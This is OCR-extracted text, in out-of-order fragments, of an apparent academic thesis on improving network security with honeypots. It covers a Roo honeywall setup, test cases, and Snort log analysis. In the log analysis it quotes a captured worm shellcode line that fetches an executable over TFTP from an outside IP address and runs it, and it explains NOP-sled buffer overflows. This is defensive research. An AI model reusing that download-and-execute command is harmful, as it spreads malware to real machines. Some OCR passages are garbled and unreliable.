77. ining credit card numbers Here only one system is touched and often with unknown vulnerabilities A good example for this is the theft of 40 million credit card details at MasterCard International On June 17 2005 the credit card company released news MasterCard 05 that CardSystems Solutions a third party processor of payment data has encountered a security breach which potentially exposed more than 40 million cards of all brands to fraud It looks like a hacker gained access to CardSystems database and installed a script that acts like a virus searching out certain types of card transaction data said MasterCard spokeswoman Jessica Antle cited from CNNMoney 05 Page 9 Improving network security with Honeypots Direct attacks are performed by skilled hackers it requires experienced knowledge In contrast to the tools used for random attacks the tools used by experienced Blackhats are not common Often the attacker uses a tool which is not published in the Blackhat community This increases the threat of those attacks It is easier to prepare against well known attacks i e teaching an IDS the signature of a XMAS attack performed with Nmap Fyodor 05 2 6 Security categories To assess the value of Honeypots we will break down security into three categories as defined by Bruce Schneier in Secrets and Lies Schneier 00 Schneler breaks security into prevention detection and response 2 6 1 Prevention Prevention means keep
78. ion 0 6a Microsoft Corporation 2003 author unknown Direct Hosting of SMB Over TCP IP Article ID 204279 Revision 3 0 Microsoft Corporation 2003 Dan Thompson IV Randy McLaughlin MS Windows NT Browser White paper last request June 25 2005 author unknown ISO IEC 7498 1 1994 Open Systems Interconnection Basic Reference Model International Organization for Standardization 1994 Dirk Piester Peter Hetzel Andreas Bauch Zeit und Normalfrequenzverbreitung mit DCF77 PTB Mitteilungen 114 Heft 4 2004 Niels Provos Honeyd Virtual Honeypot http www honeyd org Provos 2002 Martin Roesch Snort Intrusion Detection and Prevention System http www snort org last request June 25 2005 Sourcefire Inc Jon Postel ed Internet Protocol Request for comments 791 The Internet Engineering Task Force 1981 Jon Postel ed Transmission Control Protocol Request for comments 793 The Internet Engineering Task Force 1981 RFC 959 RFC 1002 RFC 1035 RFC 1122 RFC 1350 RFC1459 RFC 1700 RFC 1918 RFC 2030 RFC 2616 Improving network security with Honeypots J Postel J K Reynolds File Transfer Protocol Request for comments 959 The Internet Engineering Task Force 1985 NetBIOS Working Group in the Defense Advanced Research Projects Agency Protocol standard for a NetBIOS service on a TCP UDP transport Detailed specifications Request for comments 1002 The I
79. is a flow from lt hplP gt to lt hplP gt using Pass Fail protocol ICMP 3 10 4 Verification Verify that RO10 Walleye is displaying traffic from R003 is satisfied with steps 44 and 45 3 10 5 Results Summary Date Time Pass Fail Page B 16 Improving network security with Honeypots 3 11 Test Case 11 Honeywall sends alert messages 3 11 1 Purpose Verify that requirement RO11 has been satisfied and you are receiving alert messages 3 11 2 Setup Precondition Setup is the same as in 3 1 4 external IP functionality R004 needs to be satisfied according to 3 4 4 Testing engineer needs access to mail address configured in Roo_InitialSetup_short doc 3 11 3 Execution 46 open your mail client configured with mail address for alerting NA 47 Check that there is an email with the header ALERT OUTBOUND ICMP 48 Verify that the body of this mail contains DST lt attlP gt Pass Fail notice this is the external lt attlP gt 3 11 4 Verification Verify that R011 Honeywall sends alert messages is satisfied with step 48 3 11 5 Results Summary Page B 17 Improving network security with Honeypots 3 12 Test Case 12 Sebek is running 3 12 1 Purpose Verify that requirement R012 has been satisfied and you are receiving Sebek messages from your Honeypot 3 12 2 Setup Precondition Setup is the same as in 3 3 internal IP functionality R003 needs to be satisfi
80. ity with Honeypots Provos 02 Further it is able to emulate different operating systems and services via configuration scripts 4 2 3 Domino Domino is a distributed intrusion detection system Alerts from different IDS are combined to reduce the overall false alarm rate It is developed by Vinod Yegneswaran Paul Barford and Somesh Jha As an important component of its design it monitors dark IP addresses see chapter 2 7 This enables efficient detection of attacks from spoofed IP sources reduces false positives and enables attack classification and production of timely blacklists 4 3 Planning an experimental Honeypot After analyzing the facts and features of the suggested solutions Roo was chosen It uses a real operating system with full functionality as Honeypot while Honeyd emulates vulnerabilities and Domino monitors malicious activities only Honeyd uses scripts to emulate behavior This can be the behavior of an operating system or a particular service Of course those can be combined but it does not emulate the entire behavior of an operating system Patterns of behavior are defined in scripts which can be downloaded or personally developed Honeyd is a low interaction Honeypot see chapter 2 4 for definition Roo is using a real operating system as Honeypot This allows analyzing any vulnerability of the system Therefore Roo was chosen for further examining Available for the experiments are three desktop compute
81. l network in both directions It could be possible that the Honeypot is visible in the internal network but not in the public Somewhere in the path to the external network is a firewall which blocks the Honeypot or port forwarding is not directing traffic to the right destination Further to ROOS this requirement needs external connectivity Routers need to be configured and firewall rules need to allow traffic Using tracert can help in case the Honeypot is not reachable Honeypot is able to resolve internet DNS addresses DNS address resolution is resolving names and addresses according to RFC 1035 During one of the experiments the range of the production network was blocked including the local DNS server The problem was that outbound DNS traffic was denied and no name resolution was possible To circumvent this a firewall rule exception was created which excluded the internal DNS from the blacklist Configure DNS server address Make sure this address is reachable Attacks often use DNS resolves to connect to storages in order to download binaries Without DNS functionality this is not possible and valuable traffic would stay away Page 38 Improving network security with Honeypots R006 Honeypot is denied access to restricted IP addresses Need Protect production servers from Honeypot traffic Ex When a Honeywall is installed from scratch there exists no file fencelist txt If it is created afterwards and n
82. latforms The experiments also revealed some unforeseen results lt was not expected that such easily detectable and traceable protocols as TFIP were used for transferring data The Honeynet revealed some configuration flaws at the M nhltal net The client computers are denied UPnP services that is an industry device architecture Upnp 00 which allows clients to automatically configure NAT routers without user intervention but obviously it was not completely deactivated Experimenting with Honeypots has revealed insight information on current threats Due to the results of the unprotected environments see 5 4 one can state that it is absolutely necessary to use firewalls on desktop computers The enormous amount of attacks proofs that there is a high potential of risk surfing in the internet without firewall Further to that the experiment at Dieburg has revealed that even in a protected environment some attacks occur Honeypots also reveal if the threat comes from the internal network In the case a local computer has been infected elsewhere This could be due to a laptop user who uses his laptop at home and in the protected environment Further Honeypots can help identifying industrial spying see 2 3 2 Another fact revealed by the experiment at Muhltal was the inappropriate configuration of the UPnP service see 0 Here the Honeypot did not detect an attack but a weak configuration It helped in correcting the network setup
83. look at the flows and alerts for port 135 epmap from Roo_Mue Win2000 the port reads 53 65 flows but only 10 19 alerts this is a ratio of approximately 5 1 Roo_Mue WinXP shows analogous values 30 97 flows and 2 5 12 1 the ratio between flows and alerts is less but it concludes to a similar tendency This means that many flows did not cause any alerts or alerts 18 unfortunately no official reference for the use of these ports is available Only a website with a short description http msdn microsoft com library default asp url library en us instsal in_runsetup_7793 asp Page 63 Improving network security with Honeypots of low priority By randomly analyzing the flows without triggered alert it shows that most of the traffic was caused by connect scans see also 5 3 2 Another type of flow without ids alert seems to connect to the RPC management interface and drop the connection after success lt is likely to be an advanced type of scan for RPC services Unfortunately a verification of this suggestion would require learning and understanding the specifications of Remote Procedure Calls Further it would need to analyze the flow individually and compare the sent bytes to the original specification and check if there are deviations Analyzing the flows per IP shows that the NETBIOS DCERPC ISystemActivator path overflow attempt little endian Unicode alert is preceded by a TCP connect scan and followed by such a susp
84. mation including alerts of outbound activity and when a process has failed Enable Email alerts Yes No e Email address e Start email alerting on boot Yes No Page B 31 Improving network security with Honeypots 4 3 Sebek Packets from Honeypots Honeypots will be sending Sebek packets over the network We have to configure how the gateway will handle such packets Often the default behavior is for the firewall to block the Sebek packets so they don t go past the gateway however the Snort process listening on eth1 will collect and archive the data You also have the option of logging each Sebek packet to var log messages can become quite chatty e IP destination of Sebek packets recommend gateway of honeypots e Default UDP port of Sebek packets e Drop Allow Log Sebek packets 4 4 Hostname of gateway Page B 32 Improving network security with Honeypots 5 Additional Setup 5 1 Sebek Configuration Windows 2000 After installing Sebek SebekSetup2K exe please make sure that you run Configuration Wizard before rebooting e location of sebek driver file e Destination MAC e Destination IP e Destination port e Magic Value e NIC used by Sebek e Configuration Program Name 5 2 Fencelist 5 3 Blacklist 5 4 Whitelist Page B 33 Improving network security with Honeypots OOOZUIM N 004 JO SINS pajlelop 1 7 sunby 6E979S rs aynuiw Hae 948 e66 8 geog aynuiwsbae QCSOerl s a
85. me applications depend on the local IP address sent in the payload i e FTP sends a PORT command RFC 959 with the local IP Those applications require an Application Layer Gateway which rewrites the IP in the payload Therefore the applications on the Honeypot are not aware of the public IP and limited by the functionality of the intermediate network device 3 5 Scenario V risk assessment A Honeypot allows external addresses to establish a connection This means that packets from the outside are replied Without a Honeypot there would be no such response So a Honeypot increases traffic on purpose especially traffic which is suspicious to be malicious Page 16 Improving network security with Honeypots Security mechanisms need to make sure that this traffic is not affecting the production systems Moreover the amount of traffic needs to be controlled A hacker could use the Honeypot to launch a DoS or DDoS attack Another possibility would be to use the Honeypot as a file server for stolen software in hacker terms called warez Both cases would increase bandwidth usage and slow production traffic As hacking techniques evolve an experienced Blackhat could launch a new kind of attack which is not recognized automatically It could be possible to bypass the controlling functions of the Honeypot and misuse it Such activity could escalate the operation of a Honeypot and turn it into a severe threat A Honeypot operator needs to
86. n shows an example of a test case template Purpose describes the test s necessity Setup Precondition states what is needed to run this test In this example a stopwatch is needed Execution lists the detailed steps to perform this test and allows reviewed results to be marked as passed or failed Expected results is the verification list for the underlying test Page 41 Improving network security with Honeypots Results summary is used to capture meta data of the test such as date time name of the tester status of the test and a field for remarks and comments The test case template provides three lines of meta data in case a test failed in the first attempt and succeeded in a later run 3 1 Test Case 1 time and date 3 1 1 Purpose Verify that requirement R001 has been satisfied and attacker Honeypot and the Honeywall are set with correct time and date 3 1 2 Setup Precondition The basic setup has been done see section 1 2 This test requires a watch 3 1 3 Execution 1 check time and date on the Honeywall entering date as 2 2 Verify that the time is corresponding to your chosen time that the time is corresponding to your chosen time Pass Fail Fail Pass Fail 3 bad denen a inc time and on the Honeypot entering date and time Windows 2000 XP 4 Verify that the time is corresponding to your chosen time Pass Fail 5 check time and on the Honeypot en
87. nitialize Drive This wipes your drive and prepares it for the Honeywall installation You will have to do this if you want to proceed All data on the hardrive is lost during the initialization process 1 2 Initial Setup Method How do you want to proceed with the configuration e Floppy Use honeywall conf file from floppy for configuration e Defaults Setup from factory defaults etc Honeywall conf orig e Interview Go through and answer series of questions to configure your Honeywall 1 3 Firewall Mode e Bridge default Layer two bridging gateway e Nat Layer three routing gateway 1 4 Honeypot Public IP Addresses Space delimited list of your honeypots IP s within your Honeynet If you are doing NAT then this is the list of the public or external IP addresses IP Addresses 1 5 CIDR Notation network prefix network 1 6 Broadcast address of Honeypots Broadcast Addresses Page B 29 Improving network security with Honeypots 2 Second Section 2 1 2 4 2 5 Configure management interface NIC to use for the mgmt interface IP address of mgmt interface Network Mask of mgmt interface Default gateway of mgmt interface DNS domain for mgmt interface DNS server for mgmt interface Activate Interface now Yes No Activate Interface on reboot Yes No Configure SSH daemon on gateway listens on eth2 Port listening on Allow Root login default is no Yes No Add user
88. nter IP according to the remote managements network range Eigenschaften von VMware Network Adapter VM Allgemein Authentifizierung Erweitert Verbindung herstellen uber Eg VMware Virtual Ethernet Adapter for YM Diese Verbindung verwendet folgende Elemente Client f r Microsoft Netzwerke O al VMware Bridge Protocol O El Datei und Druckerfreigabe fur Microsoft Netzwerke M Internetprotokoll TCP IP Installieren Deinstallieren Beschreibung Erm glicht den Zugriff auf Ressourcen in einem Microsoft Netzwerk Symbol bei Verbindung im Infobereich anzeigen Y Benachrichtigen wenn diese Verbindung eingeschr nkte oder keine Konnektivit t besitzt figure 6 VMnet8 settings 6 deactivate Windows firewall Now you can boot Roo Page B 44 Improving network security with Honeypots El 700 134 VMware Workstation File Edit View VM Power Snapshot Windows Help mm gt El Snapshot Al Des x roo 134 A You do not have VMware Tools installed figure 7 gestartetes Roo Page B 45
89. nternet Engineering Task Force 1987 P V Mockapetris Domain names Implementation and specification Request for comments 1035 The Internet Engineering Task Force 1987 R Braden ed Requirements for Internet Hosts Communication Layers Request for comments 1122 The Internet Engineering Task Force 1989 K Sollins The TFTP protocol revision 2 Request for comments 1350 The Internet Engineering Task Force 1992 J Oikarinen D Reed Internet Relay Chat Protocol Request for comments 1459 The Internet Engineering Task Force 1993 J Reynolds J Postel Assigned Numbers Request for comments 1700 The Internet Engineering Task Force 1994 Y Rekhter et al Address Allocation for Private Internets Request for comments 1918 The Internet Engineering Task Force 1996 D Mills Simple Network Time Protocol SNTP Version 4 Request for comments 2030 The Internet Engineering Task Force 1996 R Fielding et al Hypertext Transfer Protocol HTTP 1 1 Request for comments 2616 The Internet Engineering Task Force 1999 Page A 3 RFC 3232 Schneier 00 SNIA 02 Sourcefire 05 Spitzner 02 Stoll 90 Upnp 00 Wikip 05 Yegneswaran 04 Page A 4 Improving network security with Honeypots J Reynolds ed Assigned Numbers RFC 1700 is Replaced by an On line Database Request for comments 3232 The Internet Engineering Task Force 2002 Bruce Schneier Secrets and Lies John Wil
90. ontrolling mechanism hence this type of control needs to read every packet decide if permitted and either drop or forward it A firewall seems to be an adequate solution for this case Firewalls typically work on Layer 3 OSI 94 During the transmit process the IP header is rewritten the Time to live field is reset the MAC address is changed and the header checksum is re calculated An advanced intruder could reveal Note a hub typically works on layer 1 OSI 94 All packets are visible on each port therefore a device can capture all traffic pointed to the other ports Page 18 Improving network security with Honeypots those changes and fingerprint the Honeywall which would make the Honeypot fairly uninteresting or even worse the attacker would attack the Honeywall 3 6 3 Analyzability This research was based on IPv4 Conclusions and comparisons could be made towards the newer version IPv6 but they are not part of this research The collected data on a Honeypot shows what happened on the wire scans intrusion attempts worm propagation and other malicious activities After dumping the packets into an analyze tool the investigator is confronted with an enormous amount of data A method is needed to weed out the informative data from the useless traffic see 5 3 for log analysis TCP connections are easy to track They provide a sequence number with identifies each packet to a corresponding flow Packets need to be ga
91. or release Roo 1 0_b139 is installed on a clean system The Honeywall a Honeypot and a client computer with standard operating system installation i e Windows XP SP2 are required for this test The client computer will be referred as the attacker in this document e The internal network provides connection to the internet e Settings for using the internet are applied on the Honeypot and the attacker e f a network range or single IP with restricted access for the Honeypot is assigned it will be referred as bllP for a single address or as blRange for a network range 1 4 Honeywall setup The Honeywall needs to be set up with three network cards NIC The Honeywall mode needs to be set to bridgeo for this test plan The management NIC needs an IP which will be referred as manIP in this document The IP of the Honeypot will be referred as hplP and the attackers IP attlP Page B 5 Improving network security with Honeypots 2 Requirements The requirements listed here are described in the document Improving network security with Honeypots This paper explains the need of each requirement gives an example why it is necessary and also shows how an error could be repaired It is recommended to be familiar with the requirement section of that paper R001 R002 R003 R004 R005 R006 R007 R008 R009 R010 R011 R012 Time and date are set Time intervals are normal Honeypot should be able
92. ot reloaded the firewall rules are not created When creating the file the fencelist has to be reloaded Attain Apply fencelist settings Create etc fencelist txt with entries of endangered addresses reload it using menu choose 4 Honeywall Configuration then 11 Outbound Fence List and finally 3 Enable Reload Fence List The fencelist is the most important tool for securing production networks Its application creates rules on the firewall which block all traffic to specified targets R007 Honeywall is logging traffic from R001 Need Ensure that the logging capabilities are working Ex The Snort process could not have been started or failed Attain Open menu choose 3 Honeywall Administration and then 6 Reload Honeywall Roo uses Snort see 4 4 1 to capture traffic Here we focus on basic packet capture which means that this is dependent on Snort s capture files R008 Walleye is activated Need Walleye see 4 4 1 provides graphical data analysis and is used to quickly analyze flows EX It is possible that the remote management interface has been configured with a wrong IP or that the apache httpd daemon failed for some reason Also it is important to see if the login is successful and user and password are working It is possible that Walleye does not restart after wiping the logging directories Page 39 Improving network security with Honeypots Attain Open menu
93. pot 192 168 10 49 figure 4 2 setup at M hltal Page 27 Improving network security with Honeypots The local network range is 192 168 10 0 24 and is connected via a NAT router to the internet All public ports on the router are statically mapped to the Honeypot s IP address No firewall rules are applied Therefore we have a combination of the following scenarios Scenario unprotected environment due to the complete forwarding of ports and the absence of firewall rules Scenario IV private address due to the address range of the local network and the use of a NA T router Setup Honeypot and Honeywall Honeypot Honeywall E MM Celeron 333 MHz Pentium III 500 Hard disk Chipset Intel BX Intel BX NIC 1 3Com 3c900 combo 3Com 3c590 password blank PERF admin Software OS Windows 2000 Build 2195 or Roo 1 0 hw 139 Windows XP Build 2600 xpsp2_gdr 050301 1519 installed fixes no Service Packs or Hotfixes n a installed figure 4 3 setup Honeypot Muhltal 4 3 2 Setup at FH Darmstadt Roo_da Roo_die At first it was planned to install the Honeypot at the Master Project Lab at Darmstadt But some preliminary tests showed the firewall rules did not allow any external traffic for this location Packets were only broadcast messages and none was directly targeting the Honeypot Thus the experiment was moved to a Page 28 Improving network security with Honeypots DMZ network with l
94. ppearing on the list A modification to snort_inline could make it possible to drop flows when they match the pattern of a long Known attack This would keep the point of attack the vulnerability open and allow other attacks to compromise the Honeypot Of course it is also possible to close the vulnerability on the Honeypot by applying a patch but in this case the Honeynet would not capture attacks other than the ones already known Many attacks on the Honeynet were successful in launching an exploit but did not succeed in downloading their binary Sometimes this was due to the outbound limit of the Honeywall and in other cases it is not obvious why it failed An improved filter should offer the following filter and categorize by attacks show alist of attacks and count their appearances Page 66 Improving network security with Honeypots 6 2 Conclusion Regarding the experiments several results were expected In general the Honeypots should provide data which shows what attacks were used at the time of capture The data was expected to show which techniques were used and how they were used to gain access to the Honeypot As the Honeypot was installed with Windows operating systems results concerning specific information about threats on Windows platforms were expected In particular most of the traffic to the Honeypot was expected to target only a bunch of vulnerable ports This was due to the default open ports on Windows p
95. ptures of a Honeynet we can see certain patterns Patterns of scans patterns of code and combining both patterns of attacks Going further it is possible to separate a single binary of a worm and let it run alone Doing this we can analyze the exact behavior of this individual threat Another pool of knowledge is the pattern of the scans a worm usually attempts When launching its propagation routine worms usually scan random addresses to distribute their malicious code Those scans follow a recognizable pattern Depending on the worm that pattern can be different which means that a scan detection engine on is an IDS might not yet know this pattern Using the information gained from the worm test it is possible to train the IDS so that it will detect further scans Page 21 Improving network security with Honeypots 3 7 2 Teaching others To learn the tools tactics and motives involved in computer and network attacks and share the lessons learned Honeynet 05 This is the slogan of the Honeynet project It is a very good reason for the use of a Honeynet Internet threats become understood better and people become more and more sensible to the dangers of a world wide network This helps reducing the amount of attacks and the waste of bandwidth caused by attacks During my experiments found that there are still a large number of worms using long known vulnerabilities In most cases there is even a patch available bu
96. re is higher which makes the use of medium interaction Honeypots more risky 2 4 3 High interaction Honeypots These are the most elaborated Honeypots They either emulate a full operating system or use a real installation of an operating system with additional Page 8 Improving network security with Honeypots monitoring High interaction Honeypots are used primarily as research Honeypots but can also serve as production Honeypots As they offer a full operating system the risk involved is very high An intruder could easily use the compromised platform to attack other devices in the network or cause bandwidth losses by creating enormous traffic 2 5 Types of attacks There are a lot of attacks on networks but there are only two main categories of attacks 2 5 1 Random attacks Most attacks on the internet are performed by automated tools Often used by unskilled users the so called script kiddies see 2 1 they search for vulnerabilities or already installed Backdoors see introduction This is like walking down a street and trying to open every car by pulling the handle Until the end of the day at least one car will be discovered unlocked Most of these attacks are preceded by scans on the entire IP address range which means that any device on the net is a possible target 2 5 2 Direct attacks A direct attack occurs when a Blackhat wants to break into a system of choice such as an eCommerce web server conta
97. rements are built for a setup with the Honeynet s tool Roo The current version these requirements are verified for is Roo 1 0 hw 139 Other versions or different products may have the same requirements but some requirements are vendor specific such as R011 Sebek is running When creating test cases for other versions or products they should follow the same template as given in 5 1 1 Requirements should make sure that all security functions are covered and analyzing features are working especially over dedicated periods to ensure stable operation R001 Time and date are set Need Time and date need to be set in order to verify connections to the time of appearance EX A Honeypot was up for one week and a successful compromise occurred But due to a wrong set clock it is not clear when it happened lt could have been at the beginning of the week where the old firewall rules were in place or at the end were the firewall administrator installed the new policy on the firewall The value of the attack s data would be degraded if the correct time is not known The question if the new firewall rules did upgrade security or open new vulnerabilities cannot be answered Attain login to console on with privileges to change time and change date and time With this firewall example one can see how important correct time is Even with the evidence of an attack its value is not the same as it would be with correct time of occurrence
98. removing the protocol binding in the properties of the VMware network adapter A setup instruction sheet was prepared to ensure repeatability see B 3 The application of VMware offers several important advantages saves money for hardware DMZ Demilitarized zone intermediate network between internet and production network Often used to place servers which offer web based services i e web server or mail server Page 29 Improving network security with Honeypots a complete Honeynet can be run on one machine saving the state of an installation is reduced to copy the files of the virtual machine only portable i e on a laptop However VMware needs powerful hardware especially when two virtual machines are supposed to run at the same time Fortunately the Barebone with Intel Pentium IV and 1GB is suitable for this purpose Figure 5 3 shows the setup at FHD VMware workstation is installed on the host computer Barebone with one network card and 1GB memory Host operating system is Windows XP Honeywall and Honeypot are installed in virtual machines Due to a decision of not connecting the management interface to the internet the data can only be read from the location of the setup This decision was made as this would pose an unidentifiable risk to the experiment lt might be possible to hack the web interface and therefore allow access to the Honeywall itself Permitting access to the management interface from
99. rets The Honeypot operator gains knowledge about the Blackhats tools and tactics When a system was compromised the administrators usually find the tools used by the attacker but there is no information about how they were used A Honeypot gives a real live insight on how the attack happened 2 3 4 Honeynets Honeynets extend to concept of single Honeypots to a network of Honeypots As said in 2 3 1 the classical Honeypot deployment consist of one Honeypot placed within a production network It is possible to deploy more than one Honeypot but each of these is a stand alone solution and according to the concept it is still a single machine Deploying a Honeynet requires at least two devices a Honeypot and the Honeywall In that scenario the attacker is given a Honeypot with a real operating system This means he can fully access and mangle it Through that possibility an attacker could easily attack other systems or launch a denial of service attack To reduce this risk a firewall is configured on the Honeywall which limits the outbound connections Access to the production network is completely restricted The Honeywall also maintains an Intrusion Detection System which monitors and records every packet going to and from the Honeypot The Honeynet project defines two Honeynet architectures Gen I first generation and Gen Il second generation Honeynet 04 The Gen l architecture is the first solution of this type and not capable
100. rk security with Honeypots trojan activity A Network Trojan was detected Detection of a Denial of Service Attack unusual client port A client was using an unusual port medium connection string detect A suspicious string was detected figure 5 10 Snort classtypes The third line of the alert shows date time source and destination IP In the fourth line Snort prints the used transport protocol here TCP and details of the IP header continued in the fifth line Unset IP flags are displayed as asterisks a set flag is indicated by a letter Here AP means that the acknowledgement ACK and the push PSH flag are set Walleye the web interface of Roo displays the flows in a clear overview and also reads the description of Snort alerts if detected any Further to this it prints a packet count and tries to guess the operating system The left pane is used for filtering The output can be limited to months days and hours Also a filter according to protocol source etc exists Page 54 Data Analysis Improving network security with Honeypots June 2005 endo tm Connections After Sun Jun 19 14 00 00 2005 Before Sun Jun 19 14 59 59 2005 June 19th 14 02 12 00 00 05 lt 1 NETBIOS SMB DS IPC unicode share access A 84 58 142 230 gt 192 168 10 39 lt Q unknown signature 14 15 16 1718 Ej TCP 3416 8 kB 20 pkt
101. rk traffic on most networks it is extremely difficult to process every data so the chances for false alarms increase with the amount of data processed High traffic also leads to non detected attacks When the system is not able to process all data it has to drop certain packets which leaves those unscanned An attacker could benefit of such high loads on network traffic 2 6 3 Response After successfully detecting an attack we need information to prevent further threats of the same type Or in case an institution has established a security policy and one of the employees violated against them the administration needs proper evidence Honeypots provide exact evidence of malicious activities As they are not part of production systems any packet sent to them is suspicious and recorded for analysis The difference to a production server is that there is no traffic with regular data such as traffic to and from a web server This reduces the amount of data recorded dramatically and makes evaluation much easier With that specific information it is fairly easy to start effective countermeasures 2 7 Dark IP Addresses Dark IP Addresses are IP addresses which are not in use or reserved for public use The Internet Assigned Numbers Authority maintains a database IANA 05 which lists reserved IP address ranges Also many institutions who have been assigned a range of addresses do not use them at all These inactive IPs are called dark
102. rovided by any installation in addition tools need to be installed which provide quick analysis of current data Without the chance of direct access i e in a hosted environment the monitoring device should provide an interface for accessing the data Problem is that access to the monitor causes extra traffic which could lead to reveal the Honeypot s existence Hence the analysis interface must be accessed over another path In addition to this the connection should be encrypted that even when discovered its true meaning must not be exposed 3 6 5 Alerting Quick response to attacks requires automatic notification of the operator An automatic alerting function should be able to send messages when an intrusion was detected Also it should be possible to send alerts in various ways In the case an alerting message fails to deliver a redundant destination path should be available The easiest trigger for alerts can be found in the nature of Honeypots Chapter 2 5 mentions that every connection made to the Honeypot is suspicious and would not occur without the presence a Honeypot However traffic which is not responded by the Honeypot is not interesting therefore outbound data should be used to trigger alerts This includes that any service which sends outbound traffic without user hacker interaction i e Browser service Microsoft 05 on Windows machines needs to be stopped But the outbound trigger can also overwhelm mailboxes An exp
103. rs Barebone with Intel Pentium IV 2 80 GHz 1GB main memory 150 GB hard disk space and a single network adapter Barebone a computer with a relatively small case and a mainboard with has been assembled to fit into the small case Typical case sizes are 20x30x20cm Market leader is Shuttle Inc http www shuttle com Page 26 Improving network security with Honeypots Midi Tower with Intel Pentium II 500 MHz 392 MB main memory 8 4 GB hard disk space and three network adapters Mini Tower with Intel Celeron 333 MHz 64 MB main memory 5GB hard disk space and a single network adapter This is suitable for two independent setups which can collect data at the same time One setup is build at network labs at FH Darmstadt and the other is build at my office in M hltal 4 3 1 Setup at M hltal Roo_mue The Midi Tower and the Midi Tower PCs are chosen for direct installation Honeywall and Honeypot operation systems are installed with the corresponding set of drivers Additionally a cross link cable is used to connect the Honeypot directly with the Honeywall The other network interfaces are connected to the local network Remote admin 192 168 10 21 private IP 192 168 10 254 Internet public IP dynamic from ISP NAT router LAN 192 168 10 0 24 remote management interface Honeywall 192 168 10 20 no IP for inbound and outbound interface MTI bridge mode Honey
104. s gt microsoft ds 21 22 23 2425 Y RST os unkn lt 1 kB 16 pkts June 19th 14 02 17 00 00 01 o 84 155 39 102 192 168 10 39 TCP 63978 0 kB 3 pkts gt 4662 I a RST Windows lt 0 kB 3 pkts o Dune 19th 14 02 18 00 00 01 lt 2 SHELLCODE x86 inc ebx NOOP 0 a 84 58 142 230 gt 192 168 10 39 0 S TCP 3673 4 kB 10 pkts gt microsoft ds 0 Fin os unkn lt 0 kB 7 pkts o Dune 19th 14 02 19 00 00 47 lt 16 TFTP Get o A 192 168 10 39 84 58 142 230 o i UDP 1041 0 kB 9 pkts gt tftp 0 om INT os unkn lt 0 kB O pkts 0 Dune 19th 14 02 41 00 00 01 u o 84 58 52 111 gt 192 168 10 39 o i icp 4330 O kB 4 pkts gt microsoft ds o Be FIN windows lt 0 kB 2 pkts 5 O Dune 19th 14 02 42 00 00 02 lt 1 NETBIOS SMB DS IPC unicode share access ori RE E A S lt 1 NETBIOS SMB DS DCERPC LSASS DsRolerUpgradeDownlevelServer exploit attempt a pkts microsoft ds u 534 656 nor Seinen lt 0 kB 9 pkts SE lt 1 SHELLCODE x86 NOOP 551 608 lt O unknown signature 538 393 Dune 19th 14 02 42 00 00 00 Ir el 84 58 35 142 gt 192 168 10 39 S TCP 2484 0 kB 4 pkts gt microsoft ds A 2 EB rin Windows lt 0 kB 2 pkts 442 1088 O Dune 19th 14 02 43 00 00 05 lt 1 NETBIOS SMB DS IPC unicode share access 369 1105 N 84 58 52 111 Bes 192 168 10 39 lt 1 NETBIOS SMB DS DCERPC LSASS DsRolerUpgradeDownlevelServer exploit attempt TETEP j TCP 3108 4 kB 14 pkts gt microsoft ds lt 1 SHELLCODE x86 NOOP UIR ST os unkn lt
105. s the role of the Honeypot and a Honeywall The connection to and from the Honeypot is under surveillance of an Intrusion Detection System on the Honeypot Suspicious behavior can be blocked with the underlying firewall Network access is maintained by a Layer 2 bridge without an IP address bound to the network adapters This allows the Honeypot to be connected to any network without problems That technique was introduced as Gen ll architecture Honeynet 04 Gen ll is an acronym for Generation Il and describes the second iteration of Honeynet architectures which processes the pakets on Layer 2 This does not change IP protocol headers and reduces the risk of revealing the existence of the Honeywall For the convenience of extracting data a management interface is installed on the Honeywall With this interface in place the Honeywall can be located in a closed server Room and the operator can maintain it from the outside 4 2 2 Honeyd Honeyd is an Open Source low interaction Honeypot lts primary purpose is to detect capture and alert suspicious activities It was developed by Niels Provos Provos 02 in April 2002 Honeyd supports interesting concepts for Honeypots lt does not monitor a single IP address for activity instead it monitors a network of dark IP addresses It is capable of handling a large amount of connections Provos states on his website that he has tested up to 65536 connections see Page 25 Improving network secur
106. scribed by their role of application To describe them in greater detail it is necessary to explain the level of interaction with the attacker 2 4 1 Low interaction Honeypots A low interaction Honeypot emulates network services only to the point that an intruder can log in but perform no actions In some cases a banner can be sent back to the origin but not more Low interaction Honeypots are used only for detection and serve as production Honeypots In comparison to IDS systems low interaction Honeypots are also logging and detecting attacks Furthermore they are capable of responding to certain login attempts while an IDS stays passive The attacker will only gain access to the emulated service The underlying operating system is not touched in any way Hence this is a very secure solution which promotes little risk to the environment where it is installed in 2 4 2 Medium interaction Honeypots Medium interaction Honeypots are further capable of emulating full services or specific vulnerabilities i e they could emulate the behavior of a Microsoft IIS web server Their primary purpose is detection and they are used as production Honeypots Similar to low interaction Honeypots medium interaction Honeypots are installed as an application on the host operating system and only the emulated services are presented to the public But the emulated services on medium interaction Honeypots are more powerful thus the chance of failu
107. serted As said before it is not clear where the process memory area resides The return address is only guessing an address which might be in control of the process To circumvent this exploit code establishes a landing zone with no operation instructions NOPs At the end it contains the actual code to connect back to the attacker Hackers call this technique NOP sliding Now the return address is pointing back into the stack 1 and after the jump the instruction pointer slides to the place where the shellcode is placed 3 address content OxFFOO OxFFOO OxFFOO OxFFOO OxFF46 OxFF3E OXFF3A en cmd c tftp i 84 58 142 230 GET MSASP32 exe amp start MSASP32 exe OxFF1C EEN 0x90 NOP a 0x90 NOP a 0x90 NOP a 0x90 NOP figure 5 7 compromised stack The shellcode cmd c tftp i 84 58 142 230 GET MSASP32 exe amp start MSASP32 exe opens a TFTP Trivial File Transfer Protocol connection to the address 84 58 142 230 downloads the file MSASP32 exe and starts it Now the Page 51 Improving network security with Honeypots file is run under the privileges of the victim service and can be used to gain full control over the computer 5 3 Log analysis in general The first part of this chapter will list the different logs of Roo while the second part will show some results of the experiments 5 3 1 Roo s logs The most important part of a Honeynet is information g
